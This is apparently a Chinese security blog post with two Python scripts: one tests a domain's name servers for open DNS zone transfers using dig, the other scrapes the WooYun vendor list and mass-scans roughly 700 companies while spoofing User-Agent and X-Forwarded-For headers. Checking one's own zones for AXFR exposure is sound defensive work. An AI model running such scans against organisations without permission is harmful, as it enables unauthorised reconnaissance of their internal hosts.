DNS域传送漏洞python扫描全乌云厂商

2016-4-2 小屿 Python

看了下渗透导图,发现什么都不会,python渣需要多写就写了这个

单个验证脚本如下:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import multiprocessing 

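def bugscan(dns,domain):
    """Check one name server for an unrestricted zone transfer (AXFR).

    Runs ``dig @<dns> <domain> axfr`` and prints a finding when the output
    contains dig's ``XFR size`` summary line and none of the failure markers.
    Matching on dig's text output is a heuristic, so a reported finding
    should be confirmed by reading the printed transfer.

    Args:
        dns: host name or address of the name server to query.
        domain: zone name to request from that server.

    Returns:
        None. The result is printed.
    """
    import subprocess  # function-scope import keeps this block self-contained

    # Both arguments reach dig's command line, and neither is trustworthy:
    # servers() takes NS names out of a DNS answer, and the batch script
    # takes domains out of a fetched web page. The original built a shell
    # string with os.popen, so any shell metacharacter in either value was
    # executed. Accept only host-name characters, and never a leading
    # '-', '+' or '@', which dig would read as an option.
    name_ok = re.compile(r'^[A-Za-z0-9_][A-Za-z0-9_.:-]*\Z')
    if not (name_ok.match(dns) and name_ok.match(domain)):
        print("testing... %r 参数不合法,已跳过" % (dns,))
        return

    try:
        # Argument list, no shell: the values are passed to dig verbatim.
        proc = subprocess.Popen(["dig", "@%s" % dns, domain, "axfr"],
                                stdout=subprocess.PIPE,
                                universal_newlines=True)
        subdomain = proc.communicate()[0]
    except OSError:
        # dig is missing or could not be started; treat it as "no output".
        subdomain = ""

    failure_markers = ('Transfer failed', 'timed out', 'not found')
    failed = any(marker in subdomain for marker in failure_markers)
    if not failed and subdomain.find('XFR size') > 0:
        print("testing... %s >>>发现漏洞<<< %s" % (dns, subdomain))
    else:
        print("testing... %s 没有发现漏洞" % dns)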

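def servers(domain):
    """Look up the NS records of *domain* and test each server with bugscan.

    Runs ``dig ns <domain>``, extracts the name-server names from the answer
    and checks them in a pool of six worker processes.

    Args:
        domain: zone name, without scheme or path.

    Returns:
        None. Progress and results are printed.
    """
    import subprocess  # function-scope import keeps this block self-contained

    # The zone name is typed by the operator or scraped by the batch script,
    # and the NS names come out of a DNS answer. All of them end up on a
    # dig command line, so only host-name characters are accepted and a
    # leading '-', '+' or '@' (dig option syntax) is refused.
    name_ok = re.compile(r'^[A-Za-z0-9_][A-Za-z0-9_.-]*\Z')
    if not name_ok.match(domain):
        print("域名不合法,已跳过 %r" % (domain,))
        return

    try:
        # Argument list instead of a shell string: nothing is re-parsed.
        proc = subprocess.Popen(["dig", "ns", domain],
                                stdout=subprocess.PIPE,
                                universal_newlines=True)
        dig = proc.communicate()[0]
    except OSError:
        # dig is missing or could not be started; nothing to scan.
        dig = ""

    # The trailing root dot is matched literally and dropped. The original
    # pattern used an unescaped '.', which removed whatever character came last.
    dns_servers = [ns for ns in re.findall(r'NS\t(\S+?)\.?\n', dig)
                   if name_ok.match(ns)]

    print("正在扫描 %s" % domain)
    pool = multiprocessing.Pool(processes=6)
    try:
        for dns in dns_servers:
            # The async results are not collected, so an exception raised
            # inside a worker is not reported here.
            pool.apply_async(bugscan, (dns, domain))
    finally:
        pool.close()
        pool.join()
    print('扫描结束!!!')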

if __name__ == "__main__":
    # Interactive entry point: print the banner, read one zone name from the
    # operator and hand it to servers().
    banner = '-------------------\nDNS域传输漏洞扫描v0.1\n-------------------'
    print(banner)
    domain = raw_input('please enter your domain without "http://"or"www":')
    servers(domain)


然后想扫乌云的全部厂商,又调用第一个脚本写了个

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import random
import re
import dns

# (description, User-Agent header value) pairs. The page-fetch loop below
# picks one entry at random for every request it sends.
_UA_ROWS = (
    ("Internet Explorer 6", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    ("Internet Explorer 7", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"),
    ("Internet Explorer 8", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"),
    ("Googlebot 2.1", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"),
    ("Msnbot 1.1", "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"),
    ("Yahoo Slurp", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"),
    ("iPhone 3.0", "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16"),
    ("Internet Explorer 7 (Windows Vista)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"),
    ("Netscape 4.8 (Windows Vista)", "Mozilla/4.8 [en] (Windows NT 6.0; U)"),
    ("Opera 9.2 (Windows Vista)", "Opera/9.20 (Windows NT 6.0; U; en)"),
    ("MSIE 6 (Win XP)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    ("MSIE 5.5 (Win 2000)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )"),
    ("MSIE 5.5 (Win ME)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"),
    ("Avant Browser 1.2", "Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)"),
    ("Opera 8.0 (Win 2000)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0"),
)
UA = [{"description": _desc, "useragent": _agent} for _desc, _agent in _UA_ROWS]

def ipTostr():
  """Return a random dotted-quad string.

  The first and last octets are drawn from 1..254 and the two middle octets
  from 0..254. The request loop in this script puts the value into the
  Client-IP and X-Forwarded-For headers. Both are plain client-supplied
  headers, so a server cannot treat them as the peer's address.
  """
  octet_bounds = ((1, 254), (0, 254), (0, 254), (1, 254))
  octets = [str(random.randint(low, high)) for low, high in octet_bounds]
  return '.'.join(octets)

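# Host names taken from the fetched pages are untrusted text that ends up as
# an argument of the dig commands run by dns.servers(). Accept only host-name
# characters, and never a leading '-', '+' or '@' (dig option syntax).
host_ok = re.compile(r'^[A-Za-z0-9_][A-Za-z0-9_.-]*\Z')

# Walk vendor-list pages 1..44 and hand every linked vendor host to dns.servers().
for i in range(1,45):
  exp_url = "http://www.wooyun.org/corps/page/%s"%i
  # Client-IP and X-Forwarded-For are filled with random values by this
  # client. They are ordinary request headers and say nothing about the
  # real peer address.
  headers = {'User-Agent': random.choice(UA)["useragent"], 'Client-IP': ipTostr(), 'X-Forwarded-For': ipTostr()}
  # NOTE(review): verify=False turns off certificate checking. It has no
  # effect on this http:// URL, but it would apply if the request were
  # redirected to https.
  response = requests.get(exp_url, headers=headers, timeout=15, verify=False)
  website = re.findall(r'nofollow" href="(?:http|https)://(.*?)" target', response.content)
  for web in website:
    domain = web.rstrip('/')
    # str.lstrip('www.') strips any run of the characters 'w' and '.', so a
    # host such as "weibo.com" lost its first letter. Remove the literal
    # prefix instead.
    if domain.startswith('www.'):
      domain = domain[len('www.'):]
    if not host_ok.match(domain):
      # Anything with a path, port, quote or shell metacharacter is skipped.
      continue
    dns.servers(domain)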

扫完发现700多厂商就几个有这个问题。

02FB6BBA-2799-4D85-B52D-F6C7CE082592.png


标签: DNS域传送
